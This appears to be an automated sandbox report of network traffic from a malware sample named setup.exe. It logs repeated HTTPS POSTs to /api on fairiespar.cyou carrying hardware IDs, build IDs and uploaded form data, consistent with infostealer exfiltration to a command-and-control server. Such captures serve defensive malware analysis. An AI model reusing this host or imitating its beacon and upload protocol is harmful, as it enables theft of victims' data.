                                                                                                                            2025-01-07 14:26:19 UTC1369INData Raw: 54 47 78 48 64 4e 70 72 6b 2f 47 57 71 46 36 53 69 36 35 61 38 4a 32 4d 2b 52 2b 61 65 77 33 43 31 59 47 6b 6e 62 76 69 75 44 6d 39 44 55 6f 4a 49 2f 49 54 43 63 4b 55 55 71 4c 6a 45 35 59 6b 76 65 7a 46 4e 2b 34 50 42 50 2f 68 2f 4c 6a 38 5a 2b 4f 41 4f 43 46 31 63 32 67 79 31 68 4b 38 6a 2b 55 48 36 2f 59 4c 34 2b 7a 73 6a 4b 51 44 6d 7a 39 74 73 75 79 38 37 50 77 2f 34 6f 55 31 43 48 78 53 5a 48 71 65 44 79 55 32 4c 45 61 4f 74 32 61 6d 75 5a 43 4e 77 54 37 44 58 75 6e 37 32 66 54 73 77 52 71 37 72 58 6c 64 42 47 6f 73 46 71 49 53 35 4d 2b 63 65 70 4b 4c 51 72 37 6c 72 66 79 42 4c 2f 4a 6e 50 4f 75 63 76 5a 7a 39 47 73 2b 6c 63 58 67 70 64 69 78 36 70 31 50 52 32 72 46 61 6e 76 39 69 6b 36 57 6f 74 4a 55 76 38 69 59 34 72 75 6e 34 2f 66 45 47 2f 71 6b
                                                                                                                            Data Ascii: TGxHdNprk/GWqF6Si65a8J2M+R+aew3C1YGknbviuDm9DUoJI/ITCcKUUqLjE5YkvezFN+4PBP/h/Lj8Z+OAOCF1c2gy1hK8j+UH6/YL4+zsjKQDmz9tsuy87Pw/4oU1CHxSZHqeDyU2LEaOt2amuZCNwT7DXun72fTswRq7rXldBGosFqIS5M+cepKLQr7lrfyBL/JnPOucvZz9Gs+lcXgpdix6p1PR2rFanv9ik6WotJUv8iY4run4/fEG/qk
                                                                                                                            2025-01-07 14:26:19 UTC1369INData Raw: 32 6a 66 71 68 4f 38 7a 38 31 71 61 72 64 75 6d 72 6a 4a 38 66 57 62 7a 69 49 55 39 2b 33 67 34 50 78 6e 34 34 41 34 49 58 31 7a 61 44 4c 57 45 72 79 50 35 51 66 72 39 67 76 6a 37 4f 79 4d 70 41 4f 62 50 32 32 32 37 4c 7a 73 2f 44 2f 69 68 51 46 30 4d 45 5a 51 4c 74 74 62 78 63 4c 30 5a 36 4a 44 72 6a 61 51 70 61 44 35 48 7a 72 47 69 4e 4f 56 69 4a 6e 68 70 68 74 46 66 56 78 31 51 76 41 75 79 78 37 63 39 36 77 4c 76 39 70 57 4a 6f 7a 52 67 50 30 65 77 77 63 4d 36 74 54 64 70 57 6c 71 31 34 30 42 58 54 7a 4f 51 47 4b 6e 4c 38 44 50 6c 57 71 50 75 6a 65 69 6f 4c 6e 30 39 54 2f 66 44 68 43 54 79 4c 32 63 2f 57 66 69 2b 44 6c 45 48 41 70 63 48 6f 34 6a 78 66 61 56 61 73 4f 44 4d 36 4c 39 6b 4e 57 4d 4f 73 4a 33 44 5a 72 55 6f 4a 33 4a 57 75 2b 68 4e 51 68 38
                                                                                                                            Data Ascii: 2jfqhO8z81qardumrjJ8fWbziIU9+3g4Pxn44A4IX1zaDLWEryP5Qfr9gvj7OyMpAObP2227Lzs/D/ihQF0MEZQLttbxcL0Z6JDrjaQpaD5HzrGiNOViJnhphtFfVx1QvAuyx7c96wLv9pWJozRgP0ewwcM6tTdpWlq140BXTzOQGKnL8DPlWqPujeioLn09T/fDhCTyL2c/Wfi+DlEHApcHo4jxfaVasODM6L9kNWMOsJ3DZrUoJ3JWu+hNQh8


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            2192.168.2.749742188.114.97.34435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:20 UTC272OUTPOST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: multipart/form-data; boundary=TYDIAY273
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 12789
                                                                                                                            Host: fairiespar.cyou
                                                                                                                            2025-01-07 14:26:20 UTC12789OUTData Raw: 2d 2d 54 59 44 49 41 59 32 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 54 59 44 49 41 59 32 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 54 59 44 49 41 59 32 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 54 59 44 49 41 59 32 37 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                            Data Ascii: --TYDIAY273Content-Disposition: form-data; name="hwid"DD277FF6ACF9075CD99589CE8AE665D5--TYDIAY273Content-Disposition: form-data; name="pid"2--TYDIAY273Content-Disposition: form-data; name="lid"hRjzG3--ALFA--TYDIAY273Content-Dispo
                                                                                                                            2025-01-07 14:26:20 UTC1122INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:20 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=kc83sf15gc8pihd0bc6pth9gbg; expires=Sat, 03 May 2025 08:12:59 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=an3dBreEkzhnNMoUAmo69fqdkq6ii4wY39Z34S0rs0Sw%2BkSslcosflYrSirDlD94bDCRwtHzGgPIkvhZM8HoKdb9tYRpA8mdSIZwSKFftBKvPU5sio7K4fl6BAp1VHgCokk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f4ccf238c54-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1811&rtt_var=688&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2834&recv_bytes=13719&delivery_rate=1580942&cwnd=184&unsent_bytes=0&cid=72ace250ab099383&ts=597&x=0"
                                                                                                                            2025-01-07 14:26:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                            2025-01-07 14:26:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            3192.168.2.749749188.114.97.34435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:21 UTC277OUTPOST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: multipart/form-data; boundary=Q61JI54KSSXTH9
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 15051
                                                                                                                            Host: fairiespar.cyou
                                                                                                                            2025-01-07 14:26:21 UTC15051OUTData Raw: 2d 2d 51 36 31 4a 49 35 34 4b 53 53 58 54 48 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 51 36 31 4a 49 35 34 4b 53 53 58 54 48 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 36 31 4a 49 35 34 4b 53 53 58 54 48 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 51 36 31 4a 49 35 34 4b 53
                                                                                                                            Data Ascii: --Q61JI54KSSXTH9Content-Disposition: form-data; name="hwid"DD277FF6ACF9075CD99589CE8AE665D5--Q61JI54KSSXTH9Content-Disposition: form-data; name="pid"2--Q61JI54KSSXTH9Content-Disposition: form-data; name="lid"hRjzG3--ALFA--Q61JI54KS
                                                                                                                            2025-01-07 14:26:21 UTC1123INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:21 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=j2qevbt23afvsuad47shdgsrn5; expires=Sat, 03 May 2025 08:13:00 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JTz5cbbeSMWdxOQGXXaYfk3yiY4nczgY9TJWYA%2BCsQgsl2cDA6owlrBnESHFN1es7wTuRLL32I6PhGkbEfOEsOctGch3DZWs8fAkQmIgeF3FuihmeS3GG0T8ngifdfLv6%2B8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f54b8ea422d-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1703&rtt_var=851&sent=10&recv=19&lost=0&retrans=1&sent_bytes=4208&recv_bytes=15986&delivery_rate=65761&cwnd=232&unsent_bytes=0&cid=247b2e1a5200eb68&ts=553&x=0"
                                                                                                                            2025-01-07 14:26:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                            2025-01-07 14:26:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            4192.168.2.749760188.114.97.34435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:22 UTC278OUTPOST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: multipart/form-data; boundary=AHNCTC1XIG648DU
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 20382
                                                                                                                            Host: fairiespar.cyou
                                                                                                                            2025-01-07 14:26:22 UTC15331OUTData Raw: 2d 2d 41 48 4e 43 54 43 31 58 49 47 36 34 38 44 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 41 48 4e 43 54 43 31 58 49 47 36 34 38 44 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 48 4e 43 54 43 31 58 49 47 36 34 38 44 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 0d 0a 2d 2d 41 48 4e 43 54 43
                                                                                                                            Data Ascii: --AHNCTC1XIG648DUContent-Disposition: form-data; name="hwid"DD277FF6ACF9075CD99589CE8AE665D5--AHNCTC1XIG648DUContent-Disposition: form-data; name="pid"3--AHNCTC1XIG648DUContent-Disposition: form-data; name="lid"hRjzG3--ALFA--AHNCTC
                                                                                                                            2025-01-07 14:26:22 UTC5051OUTData Raw: da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00
                                                                                                                            Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                                            2025-01-07 14:26:23 UTC1131INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:23 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=vol50i7ch9aiv139ddvlb0lk96; expires=Sat, 03 May 2025 08:13:02 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YHyIEejSqU8nKcCgBR7yQxjPLeIzqfDeeqGb9Y%2FpbBMom%2Fr1INkuw8liDTbBTN5iKrC7q%2B4RL7Ov4aWHPKvrALZKjCgjW75%2BGtBVdniSwVEFEeYmhT%2FBI1hqgR0neUCWtnw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f5bfeb442b3-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1900&rtt_var=718&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2835&recv_bytes=21340&delivery_rate=1519250&cwnd=237&unsent_bytes=0&cid=439307dba16a1b3e&ts=640&x=0"
                                                                                                                            2025-01-07 14:26:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                            2025-01-07 14:26:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            5192.168.2.749772188.114.97.34435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:24 UTC281OUTPOST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: multipart/form-data; boundary=HGEE2DGAOBV12WIIPM8
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 1250
                                                                                                                            Host: fairiespar.cyou
                                                                                                                            2025-01-07 14:26:24 UTC1250OUTData Raw: 2d 2d 48 47 45 45 32 44 47 41 4f 42 56 31 32 57 49 49 50 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 48 47 45 45 32 44 47 41 4f 42 56 31 32 57 49 49 50 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 48 47 45 45 32 44 47 41 4f 42 56 31 32 57 49 49 50 4d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c
                                                                                                                            Data Ascii: --HGEE2DGAOBV12WIIPM8Content-Disposition: form-data; name="hwid"DD277FF6ACF9075CD99589CE8AE665D5--HGEE2DGAOBV12WIIPM8Content-Disposition: form-data; name="pid"1--HGEE2DGAOBV12WIIPM8Content-Disposition: form-data; name="lid"hRjzG3--AL
                                                                                                                            2025-01-07 14:26:24 UTC1126INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:24 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=31adp7cdnk867f2kv8jm2bvhob; expires=Sat, 03 May 2025 08:13:03 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p4ef%2BvfITm33w1pWK69Yqxzm8xHdTEBdXOsWc8fF82Wuzcb8ge7%2FP5Bln%2FzPszOG7PncFcgm9MCHJzRvyh4o%2BsnFrDYhfRMxpliLP2b9b43z9tLTJsptZawDpM83dVjPPFs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f662d2ec333-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1694&min_rtt=1642&rtt_var=653&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2167&delivery_rate=1778319&cwnd=143&unsent_bytes=0&cid=6fdb3e2f79cf9477&ts=463&x=0"
                                                                                                                            2025-01-07 14:26:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                            2025-01-07 14:26:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            6192.168.2.749779188.114.97.34435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:25 UTC281OUTPOST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: multipart/form-data; boundary=O7VDALVF2KL0A50MGLZ
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 1110
                                                                                                                            Host: fairiespar.cyou
                                                                                                                            2025-01-07 14:26:25 UTC1110OUTData Raw: 2d 2d 4f 37 56 44 41 4c 56 46 32 4b 4c 30 41 35 30 4d 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35 0d 0a 2d 2d 4f 37 56 44 41 4c 56 46 32 4b 4c 30 41 35 30 4d 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 37 56 44 41 4c 56 46 32 4b 4c 30 41 35 30 4d 47 4c 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 41 4c
                                                                                                                            Data Ascii: --O7VDALVF2KL0A50MGLZContent-Disposition: form-data; name="hwid"DD277FF6ACF9075CD99589CE8AE665D5--O7VDALVF2KL0A50MGLZContent-Disposition: form-data; name="pid"1--O7VDALVF2KL0A50MGLZContent-Disposition: form-data; name="lid"hRjzG3--AL
                                                                                                                            2025-01-07 14:26:30 UTC1127INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:30 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=tmeikhdh9d2blqkkp7rr879m62; expires=Sat, 03 May 2025 08:13:04 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=om0tYR1jYJnjfbEX35t5QdyolT0Wj7JiB0CeEY406lnxQWnQpGMMO3qE3Kl3yJ9G3WjQaCWeBTFijyz4d5S%2Fk5YTUgCdmBWTKwAlno4hHLE9PPR6%2F%2BvHQRxv1%2BDIpYlZlMU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f6daa418ce0-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1950&rtt_var=735&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=2027&delivery_rate=1486005&cwnd=211&unsent_bytes=0&cid=5836fbdc94bb3e61&ts=5005&x=0"
                                                                                                                            2025-01-07 14:26:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                            2025-01-07 14:26:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            7192.168.2.749816188.114.97.34435916C:\Users\user\Desktop\setup.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2025-01-07 14:26:30 UTC264OUTPOST /api HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                            Content-Length: 113
                                                                                                                            Host: fairiespar.cyou
                                                                                                                            2025-01-07 14:26:30 UTC113OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 41 4c 46 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64 26 68 77 69 64 3d 44 44 32 37 37 46 46 36 41 43 46 39 30 37 35 43 44 39 39 35 38 39 43 45 38 41 45 36 36 35 44 35
                                                                                                                            Data Ascii: act=get_message&ver=4.0&lid=hRjzG3--ALFA&j=efdebde057a1df3f7c15b7f4da907c2d&hwid=DD277FF6ACF9075CD99589CE8AE665D5
                                                                                                                            2025-01-07 14:26:31 UTC1130INHTTP/1.1 200 OK
                                                                                                                            Date: Tue, 07 Jan 2025 14:26:31 GMT
                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                            Transfer-Encoding: chunked
                                                                                                                            Connection: close
                                                                                                                            Set-Cookie: PHPSESSID=gh1ckojk4em5nm2cmst4t0up6k; expires=Sat, 03 May 2025 08:13:10 GMT; Max-Age=9999999; path=/
                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                            Pragma: no-cache
                                                                                                                            X-Frame-Options: DENY
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                            vary: accept-encoding
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q0p29IGaI4e8bUOhVSv2xlafLzn9tx5eFYnWnwiG2Zw3c9rZiLLqFilvpM%2B50e93E4qwrb%2Feq2I1jSgSNsTXD%2FOHhoeSo%2BD6duIN%2BJfVM8O9F6nJWwArYRmT4h3%2Fm0d0yyc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8fe49f901b0f4339-EWR
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1577&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=1013&delivery_rate=1798029&cwnd=227&unsent_bytes=0&cid=aadd5787c241e423&ts=488&x=0"
